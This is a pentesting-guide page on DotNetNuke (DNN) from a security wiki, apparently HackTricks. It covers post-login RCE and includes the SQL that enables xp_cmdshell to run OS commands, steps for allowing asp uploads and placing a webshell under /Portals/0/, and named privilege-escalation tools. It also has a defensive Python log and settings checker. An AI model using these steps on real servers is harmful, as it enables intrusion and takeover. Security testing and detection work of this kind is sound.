hacktricks/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md


DotNetNuke (DNN)



If you log in as an administrator in DNN, it is easy to obtain RCE.

RCE

Via SQL

A SQL console is accessible under the Settings page, where you can enable xp_cmdshell and run operating system commands.

Use these lines to enable xp_cmdshell:

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

Then press "Run Script" to run those SQL statements.

Then, use something like the following to run OS commands:

xp_cmdshell 'whoami'

Via ASP webshell

In Settings -> Security -> More -> More Security Settings you can add new allowed extensions under Allowable File Extensions, and then click the Save button.

Add asp or aspx, and then in /admin/file-management upload an asp webshell called shell.asp, for example.

Then browse to /Portals/0/shell.asp to reach your webshell.
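The two traces this technique leaves can be checked from the defender's side: a script extension in the Allowable File Extensions value, and requests for script files under /Portals/ in the IIS log. The following is an added example, not code from the original page or from DNN; the function names, the script-extension list and the log lines are constructed assumptions.

```python
import re

# Extensions IIS can execute server-side (assumed list; adjust to your handler mappings).
SCRIPT_EXTS = {"asp", "aspx", "ashx", "asmx", "asa", "cer"}
# Uploaded portal files are served from /Portals/<id>/ (path taken from the page).
PORTAL_FILE = re.compile(r"^/portals/[^/]+/.*\.([a-z0-9]+)$", re.I)

# Constructed W3C-format IIS log sample (documentation IP ranges).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2024-01-10 10:00:01 GET /Portals/0/logo.png 198.51.100.7 200
2024-01-10 10:02:13 POST /Portals/0/shell.asp 198.51.100.7 200
2024-01-10 10:03:40 GET /Default.aspx 203.0.113.9 200
""".splitlines()

def risky_extensions(allowable):
    """Return script extensions found in an Allowable File Extensions value."""
    exts = {e.strip().lstrip(".").lower() for e in allowable.split(",")}
    return sorted(exts & SCRIPT_EXTS)

def flag_portal_script_requests(log_lines):
    """Return (date, time, client, uri, status) for script requests under /Portals/."""
    fields, hits = [], []
    for line in log_lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order is declared by the log itself
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        m = PORTAL_FILE.match(row.get("cs-uri-stem", ""))
        if m and m.group(1).lower() in SCRIPT_EXTS:
            hits.append((row.get("date"), row.get("time"), row.get("c-ip"),
                         row["cs-uri-stem"], row.get("sc-status")))
    return hits

if __name__ == "__main__":
    print(risky_extensions("jpg,png,pdf,.ASPX, asp"))
    for hit in flag_portal_script_requests(SAMPLE_LOG):
        print(hit)
```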

Privilege Escalation

You can escalate privileges using Potatoes or PrintSpoofer, for example.
